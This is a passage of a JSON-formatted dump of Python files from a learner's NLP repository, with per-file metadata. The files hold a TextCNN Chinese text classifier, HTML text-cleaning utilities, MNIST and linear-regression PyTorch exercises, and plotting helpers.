F.sigmoid(x2)\n out = (out > 0.5) * 1 # 0 red 1 blue but the value of out is consisting of float value between 0 to 1\n return out.data.numpy()\nplot_decision_boundary(lambda x: plot_network(x), x.numpy(), y.numpy())\nplt.title('2 layer network')\nplt.show()" }, { "alpha_fraction": 0.5215632319450378, "alphanum_fraction": 0.5384671092033386, "avg_line_length": 31.59951400756836, "blob_id": "e09bf92eb6c5169670529040deff00df48f4ff04", "content_id": "8a2640362c21e30e35feab7e8d1497ded1078aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14455, "license_type": "no_license", "max_line_length": 95, "num_lines": 412, "path": "/textcnn_comments/dataprepare/dataload.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport os\r\nimport time\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport jieba\r\nimport textcnn_comments.model.textCNN_data as textCNN_data\r\nfrom textcnn_comments.model.textCNNpy import textCNN\r\ndata_source_path ='../data/common.txt'\r\ndata_train_path = '../data/data_train.txt'\r\ndata_test_path = '../data/data_test.txt'\r\nwordlabels_path = '../data/wordlabes.txt'\r\nlengthfile_path = '../data/length.txt'\r\nstopword_path = '../data/stopword.txt'\r\ntraindataVec_path = '../data/traindataVec.txt'\r\ntestdataVec_path = '../data/testdataVec.txt'\r\nlabelsrc_path = '../data/labels.xlsx'\r\nuserdata = '../data/user_input_data.txt'\r\nuserres = '../data/user_input_res.txt'\r\nmaxLen = 16\r\n# load origin data\r\ndef partiondata():\r\n csv_data = pd.read_csv(data_source_path, encoding='utf8', header=None, sep='\\t') # 读取训练数据\r\n data_labels = csv_data[0]\r\n data_contents = csv_data[1]\r\n test_count = 1000\r\n index = 0\r\n data_test = open(data_test_path, 'w', encoding='utf_8')\r\n data_train = open(data_train_path, 'w', encoding='utf_8')\r\n for line in data_contents:\r\n # 如果去掉这句 跑不起来\r\n # 也就是说 需要数据的label号 < 5\r\n if data_labels[index] >145:# test 60 127 128\r\n # 146 出错\r\n # 145 能跑\r\n index += 1\r\n continue\r\n\r\n if (str(line) == 'nan'):\r\n index+=1\r\n continue\r\n data = str(data_labels[index]) + '\\t' + str(line)\r\n if test_count > 0:\r\n data_test.write(data)\r\n data_test.write('\\n')\r\n test_count -= 1\r\n index+=1\r\n continue\r\n data_train.write(data)\r\n data_train.write('\\n')\r\n index += 1\r\n# trans the train data to wordlabels\r\n# read train data and translate it to word label\r\ndef getwordlalbes():\r\n f_w = open(wordlabels_path, 'w', encoding='utf_8')\r\n # 记录字符\r\n # 记录序号\r\n # 计算频次\r\n worddict = {}\r\n len_dic = {}\r\n datas = open(data_source_path,'r',encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None,datas))\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n for line in datas:\r\n line_data = line.split('\\t') # line_data[0] label , #line_data[1] text\r\n text = line_data[1]\r\n text_seg = jieba.cut(text,cut_all=False)\r\n length = 0\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n length += 1\r\n if w in worddict:\r\n worddict[w] += 1\r\n else:\r\n worddict[w] = 1\r\n if length in len_dic:\r\n len_dic[length] += 1\r\n else:\r\n len_dic[length] = 1\r\n wordlist = sorted(worddict.items(),key = lambda item:item[1],reverse=True)\r\n f = open(wordlabels_path,'w',encoding='utf_8')\r\n index = 0\r\n for t in wordlist:\r\n d = t[0] + ' ' + str(index) + ' ' + str(t[1]) +'\\n'\r\n index += 1\r\n f.write(d)\r\n for k, v in len_dic.items():\r\n len_dic[k] = round(v * 1.0 / len(datas), 3)\r\n len_list = sorted(len_dic.items(), key=lambda item:item[0], reverse=True)\r\n f = open(lengthfile_path, 'w')\r\n for t in len_list:\r\n d = str(t[0]) + ' ' + str(t[1]) + '\\n'\r\n f.write(d)\r\n# text2vec 需要的函数\r\ndef get_worddict(file):\r\n datas = open(file, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n word2ind = {}\r\n for line in datas:\r\n line = line.split(' ')\r\n word2ind[line[0]] = int(line[1])\r\n ind2word = {word2ind[w]: w for w in word2ind}\r\n return word2ind, ind2word\r\n# 获取标签信息\r\ndef get_labeldic(file):\r\n lablefile = pd.read_excel(file,sheet_name='通用')\r\n df = lablefile\r\n # 获取最大行,最大列\r\n nrows = lablefile.shape[0]\r\n ncols = lablefile.columns.size\r\n print(\"=========================================================================\")\r\n print('Max Rows:' + str(nrows))\r\n print('Max Columns' + str(ncols))\r\n # 显示列名,以列表形式显示\r\n print(df.columns)\r\n\r\n # 显示列名,并显示列名的序号\r\n for iCol in range(ncols):\r\n # print(str(iCol) + ':' + df.columns[iCol])\r\n pass\r\n # 列出特定行列,单元格的值\r\n #print(df.iloc[0, 0])\r\n #print(df.iloc[0, 1])\r\n\r\n #print(df['类目'])\r\n print('=====================================End0==================================')\r\n\r\n # 查看第3列的内容,列的序号从0开始\r\n sColumnName = df.columns[2]\r\n print(df[sColumnName])\r\n print('=====================================End1==================================')\r\n # 查看某行的内容\r\n print('查看某行的内容\\n')\r\n iRow = 1\r\n for iCol in range(ncols):\r\n print(df.iloc[iRow, iCol])\r\n print('遍历逐行逐列\\n')\r\n # 遍历逐行逐列\r\n for iRow in range(nrows):\r\n for iCol in range(ncols):\r\n # print(df.iloc[iRow, iCol])\r\n pass\r\n\r\n print('=====================================End2==================================')\r\n\r\n pass\r\n# 将训练数据和测试数据转换为向量\r\ndef text2vec(file,vecfile):\r\n traindataTxt = open(vecfile, 'w')\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n datas = open(file,'r',encoding='utf_8').read().split('\\n')\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None,datas))\r\n for line in datas:\r\n line = line.split('\\t')\r\n text = line[1]\r\n # 获取标签数据 找到当前句子的对应标签\r\n label_index = line[0]\r\n text_seg = jieba.cut(text,cut_all=False)\r\n text_indexs = [label_index]\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n text_indexs.append(word2ind[w])\r\n length = len(text_indexs)\r\n if length >maxLen + 1:\r\n text_indexs = text_indexs[0:maxLen+1]\r\n if length < maxLen + 1:\r\n text_indexs.extend(['0']*(maxLen-length+1))\r\n for n in text_indexs:\r\n traindataTxt.write(str(n) + ',')\r\n traindataTxt.write('\\n')\r\n pass\r\ndef vec2text(sentence):\r\n sentence=sentence\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n text = ''\r\n #print(sentence)\r\n for index in sentence.numpy():\r\n if index ==0:\r\n continue\r\n text += ind2word[index]\r\n return text\r\n# 这个函数暂时没弄好\r\ndef read_labelFile(file):\r\n data = pd.read_excel(labelsrc_path,sheet_name='通用')\r\n label_w2n = {}\r\n label_n2w = {}\r\n # 获取最大行,最大列\r\n nrows = data.shape[0]\r\n ncols = data.columns.size\r\n # 遍历逐行逐列\r\n first_label = data['一级label']\r\n second_label = data['二级label']\r\n number_label = data['label号']\r\n # print(number_label)\r\n label_data = [number_label,first_label,second_label]\r\n return label_data\r\ndef train(textCNN_param,dataLoader_param):\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n print(os.path)\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n net.init_weight()\r\n print(net)\r\n #net.cuda()\r\n\r\n # init dataset\r\n print('init dataset...')\r\n dataLoader = textCNN_data.textCNN_dataLoader(dataLoader_param)\r\n print(dataLoader.__len__())\r\n valdata = textCNN_data.get_valdata()\r\n\r\n optimizer = torch.optim.Adam(net.parameters(), lr=0.01)\r\n criterion = nn.NLLLoss()\r\n\r\n log = open('log_{}.txt'.format(time.strftime('%y%m%d%H')), 'w')\r\n log.write('epoch step loss\\n')\r\n log_test = open('log_test_{}.txt'.format(time.strftime('%y%m%d%H')), 'w')\r\n log_test.write('epoch step test_acc\\n')\r\n print(\"training...\")\r\n #f = open('123.txt','w',encoding='utf_8')\r\n for epoch in range(50):\r\n for i, (clas, sentences) in enumerate(dataLoader):\r\n optimizer.zero_grad()\r\n sentences = sentences.type(torch.LongTensor)\r\n clas = clas.type(torch.LongTensor)\r\n out = net(sentences)# batch_size * num_classes 128*146\r\n # _nn.nll_loss(input, target, weight, _Reduction.get_enum(reduction), ignore_index)\r\n # cur_target >= 0 && cur_target < n_classes\r\n # 128*146 128 *\r\n # print(clas,'1111111')\r\n loss = criterion(out, clas)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n #if (i + 1) % 1 == 0:\r\n #print(\"epoch:\", epoch + 1, \"step:\", i + 1, \"loss:\", loss.item())\r\n #data = str(epoch + 1) + ' ' + str(i + 1) + ' ' + str(loss.item()) + '\\n'\r\n #log.write(data)\r\n print(\"save model...\")\r\n torch.save(net.state_dict(), weightFile)\r\n torch.save(net.state_dict(),\r\n \"model\\{}_model_iter_{}_{}_loss_{:.2f}.pkl\".\r\n format(time.strftime('%y%m%d%H'), epoch, i,loss.item())\r\n ) # current is model.pkl\r\n print(\"epoch:\", epoch + 1, \"step:\", i + 1, \"loss:\", loss.item())\r\n pass\r\ndef get_valData(file):\r\n datas = open(file, 'r').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n return datas\r\ndef parse_net_result(out):\r\n score = max(out) # 最大的值\r\n label = np.where(out == score)[0][0] # 找到out中与最大值所在位置相同的\r\n return label, score\r\ndef ceshi():\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n print('No weight file!')\r\n exit()\r\n print(net)\r\n # net.cuda()\r\n net.eval()\r\n numAll = 0\r\n numRight = 0\r\n testData = get_valData(testdataVec_path)\r\n for data in testData:\r\n numAll += 1\r\n data = data.split(',')\r\n label = int(data[0])\r\n sentence = np.array([int(x) for x in data[1:maxLen+1]])\r\n sentence = torch.from_numpy(sentence)\r\n predict = net(sentence.unsqueeze(0).type(torch.LongTensor)).cpu().detach().numpy()[0]\r\n label_pre, score = parse_net_result(predict)\r\n if label_pre == label and score > -100:\r\n numRight += 1\r\n if numAll % 100 == 0:\r\n print('acc:{}({}/{})'.format(numRight / numAll, numRight, numAll))\r\n pass\r\ndef get_userdata(filepath):\r\n # 读取数据\r\n datas = open(filepath,'r',encoding='utf_8').read().split('\\n')\r\n print('**********************\\n',datas)\r\n # 转换为向量\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n stoplist = open(stopword_path, 'r', encoding='utf_8').read().split('\\n')\r\n datas = list(filter(None, datas))\r\n sentens = []\r\n for line in datas:\r\n text = line\r\n label_index = -1\r\n text_seg = jieba.cut(text, cut_all=False)\r\n text_indexs = [label_index]\r\n for w in text_seg:\r\n if w in stoplist:\r\n continue\r\n text_indexs.append(word2ind[w])\r\n length = len(text_indexs)\r\n if length > maxLen + 1:\r\n text_indexs = text_indexs[0:maxLen + 1]\r\n if length < maxLen + 1:\r\n text_indexs.extend(['0'] * (maxLen - length + 1))\r\n sentens.append(text_indexs)\r\n sentens = list(filter(None, sentens))\r\n return sentens\r\n pass\r\ndef ceshiforuserdata(userdatafile,resfile):\r\n resfile = open(resfile,'w',encoding='utf_8')\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n # init net\r\n print('init net...')\r\n net = textCNN(textCNN_param)\r\n weightFile = 'weight.pkl'\r\n if os.path.exists(weightFile):\r\n print('load weight')\r\n net.load_state_dict(torch.load(weightFile))\r\n else:\r\n print('No weight file!')\r\n exit()\r\n print(net)\r\n # net.cuda()\r\n net.eval()\r\n numAll = 0\r\n numRight = 0\r\n testData = get_userdata(userdatafile)\r\n oneres = ''\r\n for data in testData:\r\n sentence = np.array([int(x) for x in data[1:maxLen+1]])\r\n sentence = torch.from_numpy(sentence)\r\n predict = net(sentence.unsqueeze(0).type(torch.LongTensor)).cpu().detach().numpy()[0]\r\n label_pre, score = parse_net_result(predict)\r\n words = vec2text(sentence)\r\n oneres +='数据:'+words\r\n oneres +='\\tlabel号:\\t'+str(label_pre)\r\n oneres +='\\t一级label:\\t'+ str(labeldata[1][label_pre])\r\n oneres +='\\t二级label:\\t'+ str(labeldata[2][label_pre])\r\n oneres +='\\n'\r\n resfile.write(oneres)\r\n pass\r\ndef main():\r\n # 数据获取并且切分为训练集和测试集\r\n partiondata()\r\n # 根据训练集获得词表\r\n getwordlalbes()\r\n # 将训练集数据转换为向量\r\n text2vec(data_train_path,traindataVec_path)\r\n # 将测试集数据转换为向量\r\n text2vec(data_test_path,testdataVec_path)\r\n word2ind, ind2word = get_worddict(wordlabels_path)\r\n # 获取标签信息\r\n labeldata = read_labelFile(labelsrc_path)\r\n textCNN_param = {\r\n 'vocab_size': len(word2ind),\r\n 'embed_dim': 60,\r\n 'class_num': len(labeldata[0]),\r\n \"kernel_num\": 16,\r\n \"kernel_size\": [3, 4, 5],\r\n \"dropout\": 0.5,\r\n }\r\n dataLoader_param = {\r\n 'batch_size': 128,\r\n 'shuffle': True,\r\n }\r\n print(textCNN_param)\r\n print('*'*100)\r\n train(textCNN_param,dataLoader_param)\r\n\r\nif __name__ == \"__main__\":\r\n print('start main...')\r\n #main()\r\n print('start test...')\r\n ceshi()\r\n print('test userinput...')\r\n ceshiforuserdata(userdata,userres)\r\n print('end...')\r\n" }, { "alpha_fraction": 0.5868024826049805, "alphanum_fraction": 0.6519043445587158, "avg_line_length": 54.04878234863281, "blob_id": "4b31a32c53c6c8f5de927217e4be8ea1511b7d37", "content_id": "6e2a825bff564ea79967b4a896f13239386b432c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "no_license", "max_line_length": 843, "num_lines": 41, "path": "/cleardata/html_parser.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "GB18030", "text": "# coding=gbk\nfrom bs4 import BeautifulSoup\nfrom utils.remove_special_symbol import redundant_remove\n\n\ndef extract_from_html(html):\n soup = BeautifulSoup(html, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\n\ndef parser_external_html(html_doc):\n soup = BeautifulSoup(html_doc, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\nif __name__ == '__main__':\n # path = '/Users/iron/Documents/公众号项目/文章/185.txt'\n path = '/Users/iron/Documents/公众号项目/文章/117.txt'\n # with open(path, 'r', encoding='utf8') as f:\n # html_doc = f.readline()\n # title, content = parser(html_doc)\n # print(\"title: \",title)\n # print(\"content: \",content)\n html = '<html><head></head><body><p style=text-align: center;line-height: 2em;margin-left: 8px;margin-right: 8px;\"><img data-src=\"http://yw-yx.oss-cn-hangzhou.aliyuncs.com/wechat/article/img/2019/06/1144582901707291786.gif\" data-type=\"gif\" class=\"\" data-ratio=\"0.14583333333333334\" data-w=\"480\" imgid=\"wechat/article/img/2019/06/1144582901707291786.gif\" src=\"http://yw-yx.oss-cn-hangzhou.aliyuncs.com/wechat/article/img/2019/06/1144582901707291786.gif\"></p><section data-role=\"outer\" label=\"Powered by 135editor.com\"><section class=\"article135\"><section data-role=\"paragraph\" class=\"_135editor\" data-color=\"#fffcf6\"><p style=\"line-height: normal;\"><br></p><p style=\"text-align: center;line-height: 2em;margin-left: 8px;margin-right: 8px;\"><strong style=\"white-space: normal;letter-spacing: 0.5px;text-align: left;background-color: rgb(255'\n\n" }, { "alpha_fraction": 0.5747541785240173, "alphanum_fraction": 0.6156933307647705, "avg_line_length": 29.378047943115234, "blob_id": "6430fa645e2ac0e0e509032576ee5eaa134e48fb", "content_id": "52537b09be9c055d48618999da94870cf40b5c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4983, "license_type": "no_license", "max_line_length": 114, "num_lines": 164, "path": "/linertest/mnist_train.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "\nimport torch\nfrom torch import nn\nfrom torch import utils\nfrom torch.nn import functional as F\nfrom torch import optim\nimport torchvision\nfrom matplotlib import pyplot as plt\nfrom linertest.utils import one_hot,plot_image,plot_curve\nbatch_size = 512\n# step1 load dataset\ntrain_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=True,download=True,transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,),(0.3081,))]\n )),\n batch_size = batch_size,shuffle = True\n)\ntest_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data', train=False, download=True, transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,), (0.3081,))]\n )),\n batch_size=batch_size, shuffle=True\n)\nx,y = next(iter(train_loader))\nprint(x.shape,y.shape)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # xw+b\n # a img is 28*28\n self.fc1 = nn.Linear(28*28,256)\n self.fc2 = nn.Linear(256,64)\n # depend on one_hot ,so we should out 10dim\n self.fc3 = nn.Linear(64,10)\n def forward(self,x):\n # x:[b,1,28,28]\n # h1 = relu(xw+b)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\nnet = Net()\noptimizer = optim.SGD(net.parameters,lr=0.01,momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n for batch_idx,(x,y) in enumerate(train_loader):\n # x\n print(x.shape,y.shape)\n # x:[b,1,28,28],y:[512]\n #[b,1,28,28]=>[b,784]\n x = x.view(x.size(0),28*28)\n # =>[b,10]\n out = net(x)\n y_one_hot = one_hot(y)\n loss = F.mse_loss(out,y_one_hot)\n optimizer.zero_grad()\n loss.backward()\n # w' = w - lr*grad\n optimizer.step()\n train_loss.append(loss.item())\n if batch_idx%10==0:\n print(epoch,batch_idx,loss.item())\nplot_curve(train_loss)\n\n# test\ntotal_correct = 0\nfor x,y in test_loader:\n x = x.view(x.size(0),28*28)\n out = net(x)\n pred = out.argmax(dim=1)\n correct = pred.eq(y).sum().float().item()\n total_correct+=correct\ntotol_sum = len(test_loader.dataset)\nacc = total_correct/totol_sum\nprint('test acc:',acc)\n\nx,y = next(iter(test_loader))\nout = net(x.view(x.size(0),2*28))\npred = out.argmax(dim=1)\nplot_image(x,pred,'Test')\nimport torch\nfrom torch import nn\nfrom torch import utils\nfrom torch.nn import functional as F\nfrom torch import optim\nimport torchvision\nfrom matplotlib import pyplot as plt\nfrom linertest.utils import one_hot,plot_image,plot_curve\nbatch_size = 512\n# step1 load dataset\ntrain_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=True,download=True,transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,),(0.3081,))]\n )),\n batch_size = batch_size,shuffle = True\n)\ntest_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data', train=False, download=True, transform=torchvision.transforms.Compose(\n [torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0.1307,), (0.3081,))]\n )),\n batch_size=batch_size, shuffle=True\n)\nx,y = next(iter(train_loader))\nprint(x.shape,y.shape)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # xw+b\n # a img is 28*28\n self.fc1 = nn.Linear(28*28,256)\n self.fc2 = nn.Linear(256,64)\n # depend on one_hot ,so we should out 10dim\n self.fc3 = nn.Linear(64,10)\n def forward(self,x):\n # x:[b,1,28,28]\n # h1 = relu(xw+b)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\nnet = Net()\noptimizer = optim.SGD(net.parameters,lr=0.01,momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n for batch_idx,(x,y) in enumerate(train_loader):\n # x\n print(x.shape,y.shape)\n # x:[b,1,28,28],y:[512]\n #[b,1,28,28]=>[b,784]\n x = x.view(x.size(0),28*28)\n # =>[b,10]\n out = net(x)\n y_one_hot = one_hot(y)\n loss = F.mse_loss(out,y_one_hot)\n optimizer.zero_grad()\n loss.backward()\n # w' = w - lr*grad\n optimizer.step()\n train_loss.append(loss.item())\n if batch_idx%10==0:\n print(epoch,batch_idx,loss.item())\nplot_curve(train_loss)\n\n# test\ntotal_correct = 0\nfor x,y in test_loader:\n x = x.view(x.size(0),28*28)\n out = net(x)\n pred = out.argmax(dim=1)\n correct = pred.eq(y).sum().float().item()\n total_correct+=correct\ntotol_sum = len(test_loader.dataset)\nacc = total_correct/totol_sum\nprint('test acc:',acc)\n\nx,y = next(iter(test_loader))\nout = net(x.view(x.size(0),2*28))\npred = out.argmax(dim=1)\nplot_image(x,pred,'Test')\n" }, { "alpha_fraction": 0.5611650347709656, "alphanum_fraction": 0.5961164832115173, "avg_line_length": 30.53061294555664, "blob_id": "7146845961cef47fd9f0365729e52966961144dc", "content_id": "0318ddde63cc2bcdba2d178c3747cec49350aebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 78, "num_lines": 49, "path": "/linertest/utils.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "\nimport torch\nfrom matplotlib import pyplot as plt\ndef plot_curve(data):\n fig = plt.figure()\n plt.plot(range(len(data)),data,color='blue')\n plt.legend(['value'],loc='upper right')\n plt.xlabel('step')\n plt.ylabel('value')\n plt.show()\ndef plot_image(img,label,name):\n fig = plt.figure()\n for i in range(6):\n plt.subplot(2,3,i+1)\n plt.tight_layout()\n plt.imshow(img[i][0]*0.3081+0.1307,cmap = 'gray',interpolation='none')\n plt.title(\"{}:{}\".format(name,label[i].itrm()))\n plt.xticks([])\n plt.yticks([])\n plt.show()\ndef one_hot(label,depth=10):\n out = torch.zero_(label.size(0),depth)\n idx = torch.LongTensor(label).view(-1,1)\n out.scatter_(dim=1,index=idx,value=1)\nimport torch\nfrom matplotlib import pyplot as plt\ndef plot_curve(data):\n fig = plt.figure()\n plt.plot(range(len(data)),data,color='blue')\n plt.legend(['value'],loc='upper right')\n plt.xlabel('step')\n plt.ylabel('value')\n plt.show()\ndef plot_image(img,label,name):\n fig = plt.figure()\n for i in range(6):\n plt.subplot(2,3,i+1)\n plt.tight_layout()\n plt.imshow(img[i][0]*0.3081+0.1307,cmap = 'gray',interpolation='none')\n plt.title(\"{}:{}\".format(name,label[i].itrm()))\n plt.xticks([])\n plt.yticks([])\n plt.show()\ndef one_hot(label,depth=10):\n out = torch.zero_(label.size(0),depth)\n idx = torch.LongTensor(label).view(-1,1)\n out.scatter_(dim=1,index=idx,value=1)\n return out\nprint( (0 > 0.5) * 1) # 0\nprint( (1 > 0.5) * 1) # 1" }, { "alpha_fraction": 0.46815288066864014, "alphanum_fraction": 0.5268425941467285, "avg_line_length": 28.70270347595215, "blob_id": "bddfaff07215deaca393b5e11b53595f0277114e", "content_id": "c461955ff2e304edc68932cdbcb4afd1bbb1f0fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2256, "license_type": "no_license", "max_line_length": 87, "num_lines": 74, "path": "/stydytest/descend_demo_torch.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\ntorch.manual_seed(2019)\ndef getdata():\n # 读入数据 x 和 y\n # 15组point(x,y)\n x_train = np.array([[3.3], [4.4], [5.5], [6.71], [6.93], [4.168],\n [9.779], [6.182], [7.59], [2.167], [7.042], [10.791],\n [5.313], [7.997], [3.1]], dtype=np.float32)\n\n y_train = np.array([[1.7], [2.76], [2.09], [3.19], [1.694], [1.573],\n [3.366], [2.596], [2.53], [1.221], [2.827],\n [3.465], [1.65], [2.904], [1.3]], dtype=np.float32)\n x_train = torch.from_numpy(x_train)\n y_train = torch.from_numpy(y_train)\n return x_train,y_train\n\n\nclass linear_Model(nn.Module):\n def __init__(self):\n super(linear_Model,self).__init__()\n self.l_1 = nn.Linear(1,1)\n pass\n def forward(self, x):\n # y = wx+b\n # loss = [y_r - (wx+b)]**2\n out = self.l_1(x)\n return out\ndef train():\n # prepare data\n x, y = getdata()\n x = Variable(x)\n y = Variable(y)\n # init model\n model = linear_Model()\n # loss\n criterion = nn.MSELoss()\n # 优化函数\n optimizer = torch.optim.SGD(model.parameters(),lr = 0.01)\n num_epochs = 1000\n for epoch in range(num_epochs):\n inputs = x#(x)\n target = y#Variable(y)\n # 向前传播\n out = model(inputs)\n loss = criterion(out, target)\n # 向后传播\n optimizer.zero_grad() # 注意每次迭代都需要清零\n loss.backward()\n optimizer.step()\n if (epoch + 1) % 20 == 0:\n print('Epoch[{}/{}], loss:{:.6f}'.format(epoch + 1, num_epochs, loss.data))\n predict(model,x,y)\n pass\n\ndef predict(model,x,y):\n model.eval()\n if torch.cuda.is_available():\n predict = model(Variable(x).cuda())\n predict = predict.data.cpu().numpy()\n else:\n predict = model(Variable(x))\n predict = predict.data.numpy()\n plt.plot(x.numpy(), y,'ro',label='Original Data')\n plt.plot(x.numpy(), predict, label='Fitting Line')\n plt.show()\n pass\nprint('dasdasdas')\nif __name__ == \"__main__\":\n train()\n" }, { "alpha_fraction": 0.5210933089256287, "alphanum_fraction": 0.5387205481529236, "avg_line_length": 32.65999984741211, "blob_id": "cc19f0aaf9847d4d7ac6f9ceee01014ae20fa3a0", "content_id": "9b951c3781f9eafa2562a04febd35085e3a65b51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5396, "license_type": "no_license", "max_line_length": 191, "num_lines": 150, "path": "/cleardata/extractor.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import re\n\nimport cchardet\nfrom bs4 import BeautifulSoup\n\nzh_punctuation = r\"\"\"#$&'()*,!?。:;<=>^_`§№☆★○●◎◇◆□■△▲▼※→←↑↓〓#&@^_⊙●○①⊕◎Θ⊙¤㊣▂ ▃ ▄ ▅ ▆ ▇ █ █ ■ ▓ 回 □ 〓≡ ╝╚╔ ╗╬ ═ ╓ ╩ ┠ ┨┯ ┷┏ ┓┗ ┛┳⊥『』┌♀◆◇◣◢◥▲▼△▽⊿{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏\"\"\"\nen_punctuation = r\"\"\"\"#$%&'()*.,:;<=>^_`{|}\\[\\]\\!\\?~-\"\"\"\npunctuation = zh_punctuation + en_punctuation\n\n\nclass Extractor():\n def __init__(self):\n pass\n\n def extract_html(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = self.redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\n def symbol_filter(self, text):\n text = re.sub(\"[A-Za-z]\", \"x\", text)\n text = re.sub('\\d', \"1\", text)\n text = re.sub(\"[\" + punctuation + \"]\", \" \", text)\n return text\n\n def stop_words_remove(self, text):\n text = text.split()\n res = ''\n for s in text:\n if re.search('(点击|蓝字|关注|订阅|推送)', s):\n continue\n else:\n res = ' '.join((res, s))\n res = ' '.join(res.split())\n return res\n\n def redundant_remove(self, text):\n text = self.symbol_filter(text)\n text = self.stop_words_remove(text)\n return text\n\n def filter(self, text):\n if '点击' in text:\n idx = text.index('点击')\n text = text[:idx]\n if '阅读原文' in text:\n idx = text.index('阅读原文')\n text = text[:idx]\n # length = len(text.strip())\n # if length > 100:\n # if length > 500:\n # text = text[130:]\n # else:text = ''\n return text\n\n def process(self, html):\n content = self.extract_html(html)\n content = self.filter(content)\n return content\n\n\nextractor = Extractor()\n\n\ndef encoder(data_path):\n f = open(data_path, 'rb').read()\n encoding = cchardet.detect(f)['encoding']\n return encoding\n\n\ndef get_corpus(html, label):\n doc_encoding = encoder(html)\n label_encoding = encoder(label)\n\n with open(html, 'r', encoding=doc_encoding) as f:\n lines = f.readlines()\n lines = [line for line in lines[1:] if line.strip() != '']\n ids = [line.split('\",')[0].replace('\"', '') for line in lines]\n texts = [extractor.process(line.split('\",')[1].replace('\"', '')) for line in lines]\n\n with 